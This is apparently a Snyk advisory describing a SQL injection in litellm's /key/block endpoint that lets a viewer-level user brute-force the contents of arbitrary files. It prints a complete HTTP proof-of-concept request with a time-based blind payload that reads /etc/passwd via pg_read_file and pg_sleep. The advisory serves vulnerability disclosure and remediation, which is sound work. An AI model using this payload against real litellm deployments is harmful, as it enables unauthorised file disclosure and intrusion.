Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applicationsThere is no fixed version for litellm
.
litellm is a Library to easily interface with LLM API providers
Affected versions of this package are vulnerable to SQL Injection via the /key/block
endpoint. A proxy_admin_viewer
user can retrieve the contents of arbitrary files on the target filesystem by brute forcing them one character at a time.
POST /key/block HTTP/1.1
Host: 127.0.0.1:4000
Content-Length: 115
Authorization: Bearer sk-5pUqaVXkY6DaR1zEKKnwwA
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36
Content-Type: application/json
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
{
"key": "1'|| CASE WHEN pg_read_file('/etc/passwd', 0, 1) = 'r' THEN pg_sleep(10) ELSE pg_sleep(0) END; -- -"
}